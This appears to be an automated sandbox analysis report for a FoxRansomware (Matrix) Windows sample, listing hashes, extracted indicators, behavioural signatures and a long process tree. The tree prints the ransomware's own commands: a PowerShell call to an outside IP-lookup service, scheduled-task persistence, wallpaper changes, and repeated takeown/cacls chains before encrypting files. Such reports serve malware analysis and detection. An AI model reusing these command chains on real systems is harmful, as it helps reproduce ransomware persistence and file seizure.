Overview
Resubmissions
03-04-2024 17:37 (240403-v68g6sga2w)

Analysis
max time kernel: 146s
max time network: 124s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 03-04-2024 17:37
Static task: static1
Behavioral task behavioral1: sample FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe, resource win7-20240221-en
Behavioral task behavioral2: sample FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe, resource win10v2004-20240226-en
Behavioral task behavioral3: sample FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe, resource win7-20240221-en
Behavioral task behavioral4: sample FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe, resource win10v2004-20240226-en
Behavioral task behavioral5: sample FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe, resource win7-20240221-en
Behavioral task behavioral6: sample FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe, resource win10v2004-20231215-en
Behavioral task behavioral7: sample FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe, resource win7-20240319-en
Behavioral task behavioral8: sample FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe, resource win10v2004-20240226-en
Behavioral task behavioral9: sample FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe, resource win7-20240221-en
Behavioral task behavioral10: sample FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe, resource win10v2004-20240226-en
Behavioral task behavioral11: sample FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe, resource win7-20240221-en
Behavioral task behavioral12: sample FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe, resource win10v2004-20240226-en
General
Target: FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Size: 1.2MB
MD5: c82d64850d35cc6a536c11adbd261cf6
SHA1: 9f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512: 777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
SSDEEP: 24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef
Malware Config
Extracted: http://myexternalip.com/raw
Extracted: C:\Program Files\Google\Chrome\Application\#KOK8_README#.rtf
  https://bitmsg.me
  https://bitmsg.me/users/sign_up
  https://bitmsg.me/users/sign_in
Signatures

Matrix Ransomware (64 IoCs)
Targeted ransomware with information collection and encryption functionality.
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
Processes: bcdedit.exe (PID 1924), bcdedit.exe (PID 2632)
Blocklisted process makes network request (1 IoCs)
Processes: powershell.exe (PID 1784), network flow 9
Drops file in Drivers directory (1 IoCs)
Processes: 6a9E8kW864.exe created file C:\Windows\system32\Drivers\PROCEXP152.SYS
Sets service image path in registry (2 TTPs, 1 IoCs)
Processes: 6a9E8kW864.exe set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"
Executes dropped EXE (64 IoCs)
Loads dropped DLL (64 IoCs)
Modifies file permissions (1 TTPs, 64 IoCs)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.
Drops desktop.ini file(s) (40 IoCs)
Enumerates connected drives (3 TTPs, 44 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow 8: myexternalip.com
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exe: Set value (str) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\pq59Xef7.bmp"
Drops file in Program Files directory 64 IoCs
Processes:
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exe (PID 1572)
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exe (PID 1784); 6a9E8kW864.exe (PID 3336, three events)
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
6a9E8kW864.exe (PID 3336)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW3O9cZ3.exe"2⤵PID:2952
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW3O9cZ3.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW3O9cZ3.exe" -n2⤵
- Executes dropped EXE
PID:2900
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\josWSiI6.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\pq59Xef7.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\pq59Xef7.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:2040
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:3036
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yMIjbvh1.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yMIjbvh1.vbs"3⤵PID:2620
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\dLETBaeG.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:3568
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\dLETBaeG.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:4076
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:3228
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:3000
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:1284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
PID:3136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Users\Admin\AppData\Local\Temp\6a9E8kW864.exe6a9E8kW8.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:2688 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:2996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:3972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:924 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:2104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2176 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2136
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:676 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:2108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵
- Modifies file permissions
PID:2492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3188 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:3436 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:3432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵
- Modifies file permissions
PID:2144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:1452 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:3760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵
- Modifies file permissions
PID:1612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2128 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3968
-
-
-
  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"" | PID 2036 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C | PID 2088
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" | PID 3936 | Modifies file permissions
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "classes.jsa" -nobanner | PID 2468 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "classes.jsa" -nobanner | PID 2532 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3148 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"" | PID 3212 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C | PID 1920
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" | PID 1524 | Modifies file permissions
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner | PID 2040 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner | PID 1684 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2644 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"" | PID 3888 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C | PID 1712
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" | PID 3068 | Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "FreeCellMCE.png" -nobanner | PID 2272 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "FreeCellMCE.png" -nobanner | PID 3236 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 540 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"" | PID 2576 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C | PID 3596
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" | PID 888 | Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "HeartsMCE.png" -nobanner | PID 2052 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "HeartsMCE.png" -nobanner | PID 3356 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 284 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"" | PID 2140 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C | PID 1720
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" | PID 2944 | Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ChessMCE.png" -nobanner | PID 2736 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "ChessMCE.png" -nobanner | PID 2260 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2828 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"" | PID 2788 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C | PID 3080
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" | PID 2092 | Modifies file permissions
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "LogTransport2.exe" -nobanner | PID 2612 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "LogTransport2.exe" -nobanner | PID 4080 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1976 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"" | PID 576 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C | PID 964
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" | PID 1708
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "bl.gif" -nobanner | PID 1952 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "bl.gif" -nobanner | PID 1652 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3468 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"" | PID 3184 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C | PID 3092
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" | PID 3800
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "forms_super.gif" -nobanner | PID 1828 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "forms_super.gif" -nobanner | PID 2280 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 2408 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"" | PID 2932 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C | PID 1944
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" | PID 2876
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "review_browser.gif" -nobanner | PID 2364 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "review_browser.gif" -nobanner | PID 3516 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 3704 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"" | PID 4092 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C | PID 4064
    [depth 3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" | PID 2556
    [depth 3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "tl.gif" -nobanner | PID 2608 | Loads dropped DLL
      [depth 4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula "tl.gif" -nobanner | PID 3156 | Executes dropped EXE
    [depth 3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe | 6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner | PID 1968 | Executes dropped EXE

  [depth 2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"" | PID 4056 | Loads dropped DLL
    [depth 3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C | PID 3728
